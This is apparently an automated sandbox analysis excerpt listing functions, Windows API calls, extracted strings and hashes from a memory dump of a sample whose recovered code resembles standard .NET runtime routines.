Instruction ID: 75ee4b70803a599c96242c68b08ef048b98be495bccbca8e8f07d0b9b678681d
Opcode Fuzzy Hash: 4ad4f0442125423d15d224f5fdb7b41b9fedda652d936443fe7276893743eeb1
Instruction Fuzzy Hash: B281B130500649EBDB11DF69D859BEEBBB8EF11304F404558E841E72D2CBB8AB89E7D1

Function 009EA240 Relevance: 10.9, APIs: 2, Strings: 5, Instructions: 402memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000000,00000000), ref: 009EA254
HeapAlloc.KERNEL32(03400000,00000000,0000002C,00000000,00000000,00000000), ref: 009EA271

Strings

#Strings, xrefs: 009EA360
#US, xrefs: 009EA428
#GUID, xrefs: 009EA525
#Blob, xrefs: 009EA5DC
#JTD, xrefs: 009EA330

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: Heap$AllocProcess
String ID: #Blob$#GUID$#JTD$#Strings$#US
API String ID: 1617791916-261533676
Opcode ID: 1dbeb3b0ecfcb9dbb209a7c0ab52c5802f8038750f44e008bdd6d7289f0c0f11
Instruction ID: 0d595f79be1f25923e12cbd7fa9ad3562de01a46e496d11ffbdf24a30335351b
Opcode Fuzzy Hash: 1dbeb3b0ecfcb9dbb209a7c0ab52c5802f8038750f44e008bdd6d7289f0c0f11
Instruction Fuzzy Hash: 04E1D7769006569BCF12CF95C880BAE77B9AF88320F154179ED05EB260EF30BE45DB61

Function 00A24AF0 Relevance: 10.8, APIs: 6, Strings: 1, Instructions: 343memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(00000000,?,?,?,?,00DA46E8,03441C98,03441848), ref: 00A24D3C
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00DA46E8,03441C98,03441848), ref: 00A24DF7
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00DA46E8,03441C98,03441848), ref: 00A24E9C
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00DA46E8,03441C98,03441848), ref: 00A24EE9
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00DA46E8,03441C98,03441848), ref: 00A24FBC
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00DA46E8,03441C98,03441848), ref: 00A24FDE

Strings

NULL, xrefs: 00A24B35

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: FreeHeap
String ID: NULL
API String ID: 3298025750-324932091
Opcode ID: cb3227c2d5617e5e264a0513f68da610309c346247c941291bfc183d3a7361ba
Instruction ID: 949637e5775e5b46c7a201bccd1075c71811afd037fca552af9614b12f70b229
Opcode Fuzzy Hash: cb3227c2d5617e5e264a0513f68da610309c346247c941291bfc183d3a7361ba
Instruction Fuzzy Hash: B1E18074A003289FDB20DF28EC55B9AB7B9AF49704F0441E9E94DAB352D7709E84CF91

Function 00761440 Relevance: 10.8, APIs: 2, Strings: 4, Instructions: 283COMMON

Download Yara Rule

APIs

RaiseException.KERNEL32(?,00000001,00000000,?,?,BBFE6088,00000000,00000000,?), ref: 00761651
RaiseException.KERNEL32(?,00000001,00000000,?), ref: 00761666

Strings

******* MANAGED EXCEPTION THROWN: Object thrown: %p MT %pT rethrow %d, xrefs: 0076149C
Exception HRESULT = 0x%x , xrefs: 007614D3
Exception HRESULT = 0x%x Message String 0x%p (db will display) InnerException %p MT %pT, xrefs: 0076152D
RCC, xrefs: 007615F7

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: ExceptionRaise
String ID: ******* MANAGED EXCEPTION THROWN: Object thrown: %p MT %pT rethrow %d$Exception HRESULT = 0x%x $Exception HRESULT = 0x%x Message String 0x%p (db will display) InnerException %p MT %pT$RCC
API String ID: 3997070919-4002280689
Opcode ID: 2dcf44ec3036ce2d459eeb8c5572f12c10d3094d7891d52dda034afe7056c15c
Instruction ID: b66e9c6ca33a743f0961983f80b9c325645ba60198fde12ea8a20389b5de66ab
Opcode Fuzzy Hash: 2dcf44ec3036ce2d459eeb8c5572f12c10d3094d7891d52dda034afe7056c15c
Instruction Fuzzy Hash: 6C919370A002089FDB10EFA4CD49BAEBBB9EF88700F544129F917E7391DB789D408B61

Function 0096F7E0 Relevance: 10.7, APIs: 7, Instructions: 217memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,00000000,?,?,0096FFC1,00000000,00000000,00000001,00000000,00000001,00000000,00000000,?,BBFE6088,-00000001), ref: 0096F8EC
HeapAlloc.KERNEL32(03400000,00000000,00000000,?,00000000,?,?,0096FFC1,00000000,00000000,00000001,00000000,00000001,00000000,00000000,?), ref: 0096F908

Part of subcall function 0096F430: GetProcessHeap.KERNEL32(BBFE6088,00000000,00000000,00C13410,000000FF,?,00983D82), ref: 0096F45E
Part of subcall function 0096F430: RtlAllocateHeap.NTDLL(03400000,00000000,00000030,BBFE6088,00000000,00000000,00C13410,000000FF,?,00983D82), ref: 0096F47A

wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00000055,00000000,00000055,?,00000000,?,?,0096FFC1,00000000,00000000,00000001,00000000,00000001,00000000,00000000), ref: 0096F96E
wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00000055,00000000,00000055,?,00000000,?,?,0096FFC1,00000000,00000000,00000001,00000000,00000001,00000000,00000000), ref: 0096F9B1

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: Heap$Processwcsncpy_s$AllocAllocate
String ID:
API String ID: 2736842452-0
Opcode ID: 693de258123e704a3b3999293c08b62622033a7a05d4728a2727661adc8312c3
Instruction ID: 130fa740cf2ff0956d99e90da91fd7f1f76f17f163a44ed2f7eb5b13a983bbe8
Opcode Fuzzy Hash: 693de258123e704a3b3999293c08b62622033a7a05d4728a2727661adc8312c3
Instruction Fuzzy Hash: AD815B72200701AFE360CF68E858BABB7E8FF50315F05417AE60DCB2A1E7B59954CB91

Function 008DCC00 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 199memoryCOMMON

Download Yara Rule

APIs

wcscpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000002, at,00000005,00000004,00000000,?,00000002), ref: 008DCCD2
HeapFree.KERNEL32(00000000,00000000,?,00000002), ref: 008DCD76
HeapFree.KERNEL32(00000000,?,00000002,00D00F78,?, ,?,00000002), ref: 008DCDF6
HeapFree.KERNEL32(00000000,00000000,008DCA90,?,00000009,00000000,00000002,00D00F78,?, ,?,00000002), ref: 008DCE36

Strings

at, xrefs: 008DCCC7
, xrefs: 008DCDAB

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: FreeHeap$wcscpy_s
String ID: $ at
API String ID: 1983039323-3158221822
Opcode ID: 413cee8a746fb2f954ff95e46b4836e57a5769b46cd70a93f18d4f93b5a7d6d4
Instruction ID: 1bec55396973e03deab33a25d3574d857fc8afcc57e0d0aa6d3221621c654071
Opcode Fuzzy Hash: 413cee8a746fb2f954ff95e46b4836e57a5769b46cd70a93f18d4f93b5a7d6d4
Instruction Fuzzy Hash: 4A719971E00208ABEB14DF94DD86BAEBBB6FF44710F14422AE811E7390DB74A905CB90

Function 00727D50 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 191memoryCOMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00727E1B
_swprintf.LIBCMT ref: 00727EC9
HeapFree.KERNEL32(00000000,?), ref: 00727F68

Strings

MVID mismatch between loaded assembly '%s' (MVID = %s) and an assembly with the same simple name embedded in the native image '%s' (MVID = %s), xrefs: 00727F07
{%08x-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x}, xrefs: 00727E10, 00727EBE
MVID mismatch between loaded assembly '%s' (MVID = %s) and version of assembly '%s' expected by assembly '%s' (MVID = %s), xrefs: 00727F1D

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: _swprintf$FreeHeap
String ID: MVID mismatch between loaded assembly '%s' (MVID = %s) and an assembly with the same simple name embedded in the native image '%s' (MVID = %s)$MVID mismatch between loaded assembly '%s' (MVID = %s) and version of assembly '%s' expected by assembly '%s' (MVID = %s)${%08x-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x}
API String ID: 3104695220-1745357930
Opcode ID: 0c8bc8ec2a7df67ce32b3ab3a750039bacb072fc8abb8bff3e7d97eac4d8319b
Instruction ID: 82098b6a3d476cf040621fcb1e64e0f579c25993c1567f47ee69580420f226e5
Opcode Fuzzy Hash: 0c8bc8ec2a7df67ce32b3ab3a750039bacb072fc8abb8bff3e7d97eac4d8319b
Instruction Fuzzy Hash: B95107F1D143186ADB049638DC02BFAF3DC9FAA201F54835AFC54F6293EB68A5849770

Function 008B4B70 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 171threadCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(74FDD070,?,?,?,BBFE6088), ref: 008B4B7E
SleepEx.KERNEL32(00000001,00000000), ref: 008B4D75
SwitchToThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00C3FA95,000000FF,?,008B6677,03426878), ref: 008B4D7B
SetLastError.KERNEL32(00000000,?,?,BBFE6088), ref: 008B4DB3

Strings

RareDisablePreemptiveGC: entering. Thread state = %x, xrefs: 008B4C18
RareDisablePreemptiveGC: leaving, xrefs: 008B4D9B

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: ErrorLast$SleepSwitchThread
String ID: RareDisablePreemptiveGC: entering. Thread state = %x$RareDisablePreemptiveGC: leaving
API String ID: 490134931-73906953
Opcode ID: 7aa4d5d2e265934e276e08808b703c729d85aa3b718c4482f63a3e46c9593162
Instruction ID: 9056996e0ed330ea6c2224f056888d294d16b9c21d2d8a68a0b02c3740e225b2
Opcode Fuzzy Hash: 7aa4d5d2e265934e276e08808b703c729d85aa3b718c4482f63a3e46c9593162
Instruction Fuzzy Hash: 0851C331600300CBDB25DF18D896BA97BA5FB82B10F084059E949DB3A3DBB4EC45CBA1

Function 0079D520 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 164stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00D03070,BBFE6088,80131192,?), ref: 0079D653
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00D00B01,BBFE6088,80131192,?), ref: 0079D66A
strcat_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00000002,00D028A8,00000000,?), ref: 0079D696
strcat_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00000002,00D03070), ref: 0079D6A6
strcat_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00000002,00D00B01), ref: 0079D6B6

Strings

EX_THROW Type = 0x%x HR = 0x%x, line %d, xrefs: 0079D74C

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: strcat_s$strlen
String ID: EX_THROW Type = 0x%x HR = 0x%x, line %d
API String ID: 3757318548-2682883104
Opcode ID: 87f1c3b03269eaf866fc66c6fec4abdc3360a39443c07fc290b0647da63021bc
Instruction ID: ea4adb21df2195e11f0e0bec1a44504f8a174cb96e53b3786d99de2a523f9c90
Opcode Fuzzy Hash: 87f1c3b03269eaf866fc66c6fec4abdc3360a39443c07fc290b0647da63021bc
Instruction Fuzzy Hash: 035196B0D01218ABDB21DF65DC49BDE7AB8AF48704F0040A4E50DA7292EBB95F44CFA5

Function 009741F0 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 152COMMON

Download Yara Rule

APIs

wcscpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00000040,DOTNET_,BBFE6088,?,0000000A,?), ref: 009742AF
wcscat_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00000040,00D13F5C), ref: 009742C7
wcscpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00000040,COMPlus_), ref: 0097438E
wcscat_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00000040,00D13F5C), ref: 009743A1

Strings

DOTNET_, xrefs: 009742A1
COMPlus_, xrefs: 009742B8, 00974384

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: wcscat_swcscpy_s
String ID: COMPlus_$DOTNET_
API String ID: 1337066035-1316173318
Opcode ID: 410819203d2613bd6c731ec35a16b6e4e7cea3077c83cb94ce69c94ae214a505
Instruction ID: b327ea2dd919f1f71f7279c9544027aff847bfe75f4848c066e12016f2387271
Opcode Fuzzy Hash: 410819203d2613bd6c731ec35a16b6e4e7cea3077c83cb94ce69c94ae214a505
Instruction Fuzzy Hash: DC613CB1D052689FDB20DF68CD457DABBB8AB06704F0081DAE94DA7282D7745F84CF91

Function 008D9960 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,?,?,?), ref: 008D99B1
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 008D99EB
wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,?,missing,000000FF,?,?,?), ref: 008D9A15
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000000), ref: 008D9A7D
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,00000000), ref: 008D9A9D

Strings

missing, xrefs: 008D9A0A

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: ByteCharMultiWide$wcsncpy_s
String ID: missing
API String ID: 3917916234-4037049305
Opcode ID: aadac51503ad3a984fab041943eaea4c169022360967fae3e501c5320cafd7d6
Instruction ID: ac5fc1199679fe92619d49f06e503346c8c49ff0fd26d15f0e8cbed7473ed8d8
Opcode Fuzzy Hash: aadac51503ad3a984fab041943eaea4c169022360967fae3e501c5320cafd7d6
Instruction Fuzzy Hash: 7641F332700215BBDB249B69DC56FAE7BA5EB45330F30032AFA29EB3D4DA7199008751

Function 00A310F0 Relevance: 10.6, APIs: 7, Instructions: 79stringCOMMON

Download Yara Rule

APIs

GetCommandLineW.KERNEL32(00000000,00000000,?,?,?,00A34810,?,00000000), ref: 00A31107
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,03400FF8,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00A34810,?,00000000), ref: 00A31129
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,00A34810,?,00000000), ref: 00A3113B
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,03400FF8,000000FF,00000000,?,00000000,00000000), ref: 00A3115C
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A35556), ref: 00A31167
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000), ref: 00A3117F
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A35556), ref: 00A311A2

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: ByteCharMultiWidefree$CommandLinemallocstrcmp
String ID:
API String ID: 2300001080-0
Opcode ID: 62d0f802fff6b4c03849703e8c279d53baf26a451576de0f7bc44e5e09a2a160
Instruction ID: 7babe19775b6507903576543bfae18574dd874f4fe8f5bb064fcb58361f5fc4d
Opcode Fuzzy Hash: 62d0f802fff6b4c03849703e8c279d53baf26a451576de0f7bc44e5e09a2a160
Instruction Fuzzy Hash: 3E21B735641361B7E73257665C09BAFBBACAB45B60F240339FF01A63D0DAA0DD0086E5

Function 009836F0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 61registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,00000000,00000001,00000000,?,00000000,?,00B75F75,00000000,?,00710000,00000000,00710000), ref: 00983712
RegQueryValueExW.ADVAPI32(00000000,~MHz,00000000,00000000,?,00710000,?,00B75F75,00000000,?), ref: 00983739
RegCloseKey.ADVAPI32(00000000,?,00B75F75,00000000,?), ref: 00983754
RegCloseKey.ADVAPI32(00000000,?,00B75F75,00000000,?), ref: 0098376D

Strings

~MHz, xrefs: 00983731
HARDWARE\DESCRIPTION\System\CentralProcessor\0, xrefs: 00983703

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: Close$OpenQueryValue
String ID: HARDWARE\DESCRIPTION\System\CentralProcessor\0$~MHz
API String ID: 1607946009-2226868861
Opcode ID: cb9f1ba4373fb3b3ec07c67b642b73e6314868ec6e73aa7a80b94533eea9b16b
